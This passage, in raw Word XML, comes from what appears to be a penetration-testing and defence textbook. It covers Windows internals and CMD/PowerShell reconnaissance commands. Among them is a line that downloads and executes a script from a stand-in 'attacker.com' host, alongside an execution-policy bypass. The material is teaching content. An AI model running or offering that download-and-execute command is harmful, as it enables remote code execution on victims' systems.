          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Package: *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin: release o=Kali         # Kali gets medium priority</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin-Priority: 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Package: *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin: release o=Parrot       # Parrot gets medium priority</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pin-Priority: 100</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This prevents dependency conflicts when pulling tools from multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F8A9A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">PART THREE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">WINDOWS SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F8A9A" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 6: Windows Architecture &amp; Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The majority of corporate environments run Windows. Understanding Windows internals is essential for both attacking (penetration testing) and defending (blue team) corporate networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Windows Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows is built on the NT Kernel architecture with a clear division between user space and kernel space:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User Mode: Where applications run. Limited hardware access. Crashes don't take down the system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Mode: Where the OS core runs. Full hardware access. Crashes = Blue Screen of Death (BSOD).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Windows components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NTFS (NT File System): Default Windows file system. Supports permissions, encryption (EFS), compression, and audit logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Registry: Central database of configuration settings. A goldmine for attackers and forensics analysts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SAM (Security Account Manager): Stores local user account credentials as NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LSASS (Local Security Authority Subsystem Service): Manages authentication. Primary target for credential dumping (mimikatz).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WMI (Windows Management Instrumentation): Powerful management framework. Also a popular lateral movement method.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory (AD): Directory service for domain environments. The crown jewel of most corporate networks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Windows Command Line &amp; PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows gives you two command-line interfaces. Learn both - attackers use both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Prompt (CMD) - Basic but universal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami                       # Current user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /priv                 # Current privileges</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net user                     # List local users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">net localgroup administrators  # List admins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig /all                # Network configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano                 # Connections with PIDs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tasklist                     # Running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">systeminfo                   # System information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">dir /ah C:\                  # List hidden files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">reg query HKLM\SOFTWARE\...  # Query registry</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell - The real power:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Process                  # Running processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-Service                  # Running services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-NetIPAddress             # IP configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-LocalUser                # Local user accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-EventLog -LogName Security -Newest 50  # Security logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://attacker.com/shell.ps1 | IEX  # Download &amp; run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="00FF7F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Set-ExecutionPolicy Bypass -Scope Process  # Bypass script restrictions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E5F8A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ATTACKER NOTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:left w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:bottom w:val="single" w:color="2E5F8A" w:sz="4"/>
              <w:right w:val="single" w:color="2E5F8A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="D5E8F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PowerShell is used extensively in modern attacks because it's built into Windows and can bypass many security controls. It can also be used for defensive scripting and automation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="160"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Windows Authentication &amp; Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows authentication is complex and has been the source of some of the most devastating attacks in history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
